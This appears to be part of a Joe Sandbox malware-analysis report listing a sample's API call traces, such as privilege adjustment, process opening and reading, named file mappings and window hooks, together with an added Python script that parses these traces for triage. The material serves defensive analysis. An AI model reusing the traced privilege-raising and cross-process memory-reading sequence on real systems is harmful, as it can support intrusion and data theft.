• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Memory$Process$Virtual$AllocateCloseHandleInformationModule32OpenQueryReadSystem_memset$AdjustCreateFirstFreeNextPrivilegeSnapshotToolhelp32
• String ID: $2$2$Bass.dll$G$H$I$M$U$d$e$i$i$o$t$u
• API String ID: 736719229-977268173
• Opcode ID: 1172380c352def58963c863074238b151678e0b8d799e7603d366d684b2acdd0
• Instruction ID: c2fd78cef0189133bec5effa0d0b3256dcc01d8cb93f2810c4bf87f2bf396bdd
• Opcode Fuzzy Hash: 1172380c352def58963c863074238b151678e0b8d799e7603d366d684b2acdd0
• Instruction Fuzzy Hash: 1F417F6150C3C09DD311DB688848B9FBFD45FAA64CF080A5DF1D866292DBB9CA08C77B
APIs
• OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0BEF576B
• MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000000,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF5C04,?,?,?,00000008,00000000), ref: 0BEF57A2
  • Part of subcall function 0BEF4DB0: MessageBoxA.USER32(00000000,00000000,00000000,00000040), ref: 0BEF4DCA
Strings
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: File$MappingMessageOpenView
• String ID: $00000000$.mem$.mtx$Index$MessageBox$readnowid.mtx$xxxxxx
• API String ID: 1254488582-3625701455
• Opcode ID: c5d9a9c897abff491e354b3bdfd92a0dfee70157a936e7f136cec4084f3c360b
• Instruction ID: 9a97f3c394b4e00ea8552ffa8f81786837067ecad7a2d13f3ebeca1946762bc4
• Opcode Fuzzy Hash: c5d9a9c897abff491e354b3bdfd92a0dfee70157a936e7f136cec4084f3c360b
• Instruction Fuzzy Hash: 0DD16530B1020A9FDF11EBB8E892F9E77F6EB64704F106025E601AB394CB759E498B54
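Two of the listings above are the ones worth pulling out of this part of the report for triage: the function in the 6A6D0000 module that enumerates modules with CreateToolhelp32Snapshot, adjusts a privilege, opens a process and then calls ReadProcessMemory twice, and the function in the 0BE90000 module that opens and maps a named file mapping. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the report's "APIs" line shape (`• Api.MODULE(col,col,...), ref: ADDR`, with the `Part of subcall function XXXX:` prefix for calls inside callees) into call records and flags those two patterns. It decodes only the leading argument columns, on the assumption that those are the call's real parameters and later columns are just further stack slots (so the `001FFFFF` value on the ZwOpenProcess lines is not read as an access mask): CreateToolhelp32Snapshot flags 0x8 (TH32CS_SNAPMODULE), ZwQuerySystemInformation class 0x10 (SystemHandleInformation), the two 0x40000-byte reads at 0x4A0000 and 0x600000, and the 0x6 (FILE_MAP_READ|FILE_MAP_WRITE) access on OpenFileMappingA and MapViewOfFile. The candidate object names (.mem, .mtx, readnowid.mtx) come from the block's "String ID" list. The sample lines are constructed copies of lines from the report; the function names and the shape of the triage output are this example's own.

```python
"""Added example: parse Joe Sandbox "APIs" lines and flag two call patterns."""
import re
from dataclasses import dataclass
from typing import Optional

# "• Api.MODULE(col,col,...), ref: ADDR"; calls inside a callee carry the prefix
# "Part of subcall function XXXX:".  Parens and ref are both optional.
_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<cols>[^)]*)\))?\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$")
_HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

TH32CS_SNAPMODULE = 0x8            # CreateToolhelp32Snapshot dwFlags (Windows SDK)
SYSTEM_HANDLE_INFORMATION = 0x10   # ZwQuerySystemInformation SystemInformationClass
FILE_MAP_WRITE, FILE_MAP_READ = 0x2, 0x4

@dataclass
class Call:
    api: str
    module: str
    cols: list            # int for 8-hex-digit columns, None for "?", str otherwise
    ref: str
    callee: Optional[str]

    def col_int(self, i):
        """Column i as an int, else None.  Assumption: only the leading columns
        are the call's real parameters; later ones are further stack slots."""
        v = self.cols[i] if i < len(self.cols) else None
        return v if isinstance(v, int) else None

def _parse_col(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if _HEX8_RE.match(tok) else tok

def parse_api_lines(text):
    """One Call per recognised line; anything else (headings etc.) is skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if m:
            cols = [_parse_col(t) for t in m["cols"].split(",")] if m["cols"] else []
            calls.append(Call(m["api"], m["module"], cols, m["ref"] or "", m["callee"]))
    return calls

def parse_string_ids(line):
    """Split the report's "$"-separated String ID list, dropping numeric tokens."""
    _, _, rest = line.partition("String ID:")
    return [t for t in (s.strip() for s in rest.split("$")) if t and not _HEX8_RE.match(t)]

def decode_map_access(v):
    if v is None:
        return None
    bits = [n for b, n in ((FILE_MAP_READ, "read"), (FILE_MAP_WRITE, "write")) if v & b]
    return "+".join(bits) or hex(v)

def describe_process_read(calls):
    """ReadProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, ...) plus its set-up calls."""
    reads = [(c.col_int(1), c.col_int(3)) for c in calls if c.api == "ReadProcessMemory"]
    if not reads:
        return None
    names = {c.api for c in calls}
    return {
        "opens_process": bool(names & {"OpenProcess", "ZwOpenProcess", "NtOpenProcess"}),
        "adjusts_privilege": "RtlAdjustPrivilege" in names,
        "enumerates_modules": any(c.api == "CreateToolhelp32Snapshot"
                                  and (c.col_int(0) or 0) & TH32CS_SNAPMODULE for c in calls),
        "queries_handle_table": any(c.api == "ZwQuerySystemInformation"
                                    and c.col_int(0) == SYSTEM_HANDLE_INFORMATION for c in calls),
        "reads": reads,
    }

def describe_named_mapping(calls, strings):
    """OpenFileMapping(dwDesiredAccess, ...) + MapViewOfFile(h, dwDesiredAccess, ...)."""
    opens = [c for c in calls if c.api in ("OpenFileMappingA", "OpenFileMappingW")]
    if not opens:
        return None
    views = [c for c in calls if c.api == "MapViewOfFile"]
    return {"open_access": decode_map_access(opens[0].col_int(0)),
            "view_access": decode_map_access(views[0].col_int(1)) if views else None,
            "candidate_names": strings}

def triage(api_block, string_id_line=""):
    calls = parse_api_lines(api_block)
    return {"calls": len(calls),
            "process_read": describe_process_read(calls),
            "named_mapping": describe_named_mapping(calls, parse_string_ids(string_id_line))}

# Constructed copies of lines from the two report blocks.
SAMPLE_MEMORY_READ = """\
• Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
• Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
• Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
• Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
• Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
• _memset.LIBCMT ref: 6A6DAC55
• ReadProcessMemory.KERNEL32(00000000,004A0000,?,00040000,?,?,?,?,?,?,?,6A6DD365), ref: 6A6DAC78
• ReadProcessMemory.KERNEL32(00000000,00600000,?,00040000,?,?,?,?,?,?,?,6A6DD365), ref: 6A6DACFF
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6A6DD365), ref: 6A6DAD6F
"""
SAMPLE_FILE_MAPPING = """\
• OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0BEF576B
• MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000000,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF5C04,?,?,?,00000008,00000000), ref: 0BEF57A2
• Part of subcall function 0BEF4DB0: MessageBoxA.USER32(00000000,00000000,00000000,00000040), ref: 0BEF4DCA
"""
SAMPLE_STRING_ID = "• String ID: $00000000$.mem$.mtx$Index$MessageBox$readnowid.mtx$xxxxxx"

if __name__ == "__main__":
    print(triage(SAMPLE_MEMORY_READ))
    print(triage(SAMPLE_FILE_MAPPING, SAMPLE_STRING_ID))
```

The point of keeping the columns as raw stack slots rather than naming them is that the report prints more columns than the API takes; the decoder only trusts positions that map onto the documented parameter list, and leaves the rest (including the repeated `00010000,001FFFFF` pair) for a human to interpret.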
APIs
• __EH_prolog3_GS.LIBCMT ref: 6A6F9696
  • Part of subcall function 6A6F3FBD: __EH_prolog3.LIBCMT ref: 6A6F3FC4
• CallNextHookEx.USER32(?,?,?,?), ref: 6A6F96DA
  • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
  • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
• GetClassLongA.USER32(?,000000E6), ref: 6A6F971E
• GlobalGetAtomNameA.KERNEL32(?,?,?,?,?,?,00000005), ref: 6A6F9748
• SetWindowLongA.USER32(?,000000FC,Function_0002856B), ref: 6A6F979D
• _memset.LIBCMT ref: 6A6F97E7
• GetClassLongA.USER32(?,000000E0), ref: 6A6F9817
• GetClassNameA.USER32(?,?,00000100), ref: 6A6F9838
• GetWindowLongA.USER32(?,000000FC), ref: 6A6F985C
• GetPropA.USER32(?,AfxOldWndProc423), ref: 6A6F9876
• SetPropA.USER32(?,AfxOldWndProc423,?), ref: 6A6F9881
• GetPropA.USER32(?,AfxOldWndProc423), ref: 6A6F9889
• GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 6A6F9891
• SetWindowLongA.USER32(?,000000FC,Function_0002953F), ref: 6A6F989F
• CallNextHookEx.USER32(?,00000003,?,?), ref: 6A6F98B7
• UnhookWindowsHookEx.USER32(?), ref: 6A6F98CB
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
• String ID: #32768$AfxOldWndProc423$ime
• API String ID: 1191297049-4034971020
• Opcode ID: 6ae707954b3723763a9b649bf649bebedeae5d9ba3a46eb8d6cacde036c340fc
• Instruction ID: 23a64423457102530aa9151b66bed536c8dbcc0637a89a017b591ac0fc71a8a2
• Opcode Fuzzy Hash: 6ae707954b3723763a9b649bf649bebedeae5d9ba3a46eb8d6cacde036c340fc
• Instruction Fuzzy Hash: 9461D472500216AFDB119FA5CC48B9E7BFAAF06329F010960F914E61C0DF35CE82CBA5
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(?,00000054,?), ref: 0BEB7A87
                                                                                  • GetDC.USER32(00000000), ref: 0BEB7AB5
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0BEB7AC6
                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0BEB7AE1
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB7AFB
                                                                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0BEB7B1D
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0BEB7B2B
                                                                                  • SelectObject.GDI32(?), ref: 0BEB7B73
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB7B86
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB7B8F
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB7B9B
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB7BA4
                                                                                  • SetBkColor.GDI32(?), ref: 0BEB7BAE
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0BEB7BD2
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB7BDC
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB7BEF
                                                                                  • DeleteObject.GDI32 ref: 0BEB7BFB
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB7C11
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB7C2C
                                                                                  • DeleteDC.GDI32(00000000), ref: 0BEB7C48
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB7C59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                  • String ID:
                                                                                  • API String ID: 332224125-0
                                                                                  • Opcode ID: 9ef30dce628c815b92940c22dad1f9d1fca2bd8d0f4cfef9199a604ed82bb3d1
                                                                                  • Instruction ID: b076a9548b9fd19974ebbe2e85abda64c2e8cab74730418b06ee17314cdfc22d
                                                                                  • Opcode Fuzzy Hash: 9ef30dce628c815b92940c22dad1f9d1fca2bd8d0f4cfef9199a604ed82bb3d1
                                                                                  • Instruction Fuzzy Hash: 5E510971E14208AFDF10EBE8DC96FEFB7B8AB49700F105465B614E7680D6749D48CBA4
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: .$G$N$N$R$i$n$n$o$t$t$t$t$uNno$v
                                                                                  • API String ID: 2574300362-245161538
                                                                                  • Opcode ID: 7ca0cb654ba2dce7acc6640bbe3a1132d82660ac884432d5c28ce52688b32460
                                                                                  • Instruction ID: 1150c046f6dc65eb698efc1a571871f8ce5f1344add7b305295d1e89e3d1835c
                                                                                  • Opcode Fuzzy Hash: 7ca0cb654ba2dce7acc6640bbe3a1132d82660ac884432d5c28ce52688b32460
                                                                                  • Instruction Fuzzy Hash: CF31D11110D3C1DDE302CB79844878FBFD51BAA648F48898DF0C897282C6AAD64CC77B
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,75A84A40,6A6F5C2C,?,?,?,?,?,?,?,6A6F7A16,00000000,00000002,00000028), ref: 6A6F5B02
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6A6F5B1E
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6A6F5B2F
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6A6F5B40
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6A6F5B51
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6A6F5B62
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6A6F5B73
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 6A6F5B84
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                  • API String ID: 667068680-68207542
                                                                                  • Opcode ID: c825aa007aab9baa6fef84c49beac81b8348fa49b77b4ca19af87af1e8594797
                                                                                  • Instruction ID: fe17fafd1a461ddca00cac73298b51fa9683420a14fd67c374f6c86fe5b66eeb
                                                                                  • Opcode Fuzzy Hash: c825aa007aab9baa6fef84c49beac81b8348fa49b77b4ca19af87af1e8594797
                                                                                  • Instruction Fuzzy Hash: 21214AB19101999FDF109FB58DE4D29BEF9AA4B2043994C3FEA02E3100DB305D468F11
                                                                                  APIs
                                                                                  • CreateSemaphoreA.KERNEL32(00000000,?,?,00000000), ref: 0BEF50F0
                                                                                    • Part of subcall function 0BE97260: CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002000,00000000), ref: 0BEF5242
                                                                                    • Part of subcall function 0BEF4DB0: MessageBoxA.USER32(00000000,00000000,00000000,00000040), ref: 0BEF4DCA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$FileMappingMessageMutexSemaphore
                                                                                  • String ID: $00000000$.mem$.mtx$@none$File$Index$MessageBox$Mutx$xxxxxx
                                                                                  • API String ID: 2259750652-816945559
                                                                                  • Opcode ID: e93da5820fc59886879878571806257741d9e3023fe84ea14ae00eaa5e75325a
                                                                                  • Instruction ID: b1a14bcdbc09341b63a3f2cee9248151ac8fb47484bc2d67f97e2bd3309b60bb
                                                                                  • Opcode Fuzzy Hash: e93da5820fc59886879878571806257741d9e3023fe84ea14ae00eaa5e75325a
                                                                                  • Instruction Fuzzy Hash: 8FC1A570B1020E9FDF10EBA4E842B9D77F6EF64715F106024E601AB394DB75EE0A9B64
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FA9DA: GetWindowLongA.USER32(?,000000F0), ref: 6A6FA9E5
                                                                                  • GetParent.USER32(?), ref: 6A6F7955
                                                                                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 6A6F7978
                                                                                  • GetWindowRect.USER32(?,?), ref: 6A6F7992
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 6A6F79A8
                                                                                  • CopyRect.USER32(?,?), ref: 6A6F79F5
                                                                                  • CopyRect.USER32(?,?), ref: 6A6F79FF
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 6A6F7A08
                                                                                  • CopyRect.USER32(?,?), ref: 6A6F7A24
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
